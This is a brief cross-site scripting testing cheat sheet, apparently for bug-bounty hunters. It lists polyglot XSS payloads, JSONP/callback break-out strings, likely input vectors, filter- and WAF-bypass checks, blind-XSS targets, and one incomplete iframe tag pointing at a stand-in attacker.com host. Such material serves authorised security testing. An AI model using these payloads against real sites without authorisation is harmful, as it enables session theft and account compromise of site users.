Core Idea: Does the page functionality display something to the users? For time sensitive testing the 80/20 rule applies. Many testers use Polyglot payloads. You probably have too!

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id)>'"><img src="http://i.imgur.com/P8mL8.jpg">

" onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)//

Input Vectors:

• Customizable Themes & Profiles via CSS
• Event or meeting names
• URI based
• Imported from a 3rd party (think Facebook integration)
• JSON POST Values (check returning content type)
• File Upload names
• Uploaded files (swf, HTML, ++)
• Custom Error pages
• fake params - ?realparam=1&foo=bar'+alert(/XSS/)+'
• Login and Forgot password forms

Common Params: onload, allowedDomain, movieplayer, xmlPath, eventhandler, callback (more on OWASP page)

Common Injection Strings:

\%22})))}catch(e){alert(document.domain);}//

"]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//

"a")(({type:"ready"}));}catch(e){alert(1)}//

• How are non-malicious tags handled? <h2>, <b>
• Incomplete tags? <iframe src=attacker.com/c= * Encodings? <%00h2>, %0d, %0a, %09 * Hardcoded blacklist? Does </script/x> work? <ScRiPt>''? * WAF filter: does it filter parameter values but not names? Blind XSS targets: support tickets, admin-visible fields (name, bio), log-visible headers (User-Agent, Referer). Missed vectors: CSS customization fields, event names, file upload filenames, JSON POST bodies, custom error pages, mobile app forms. * Full Zseano XSS Guide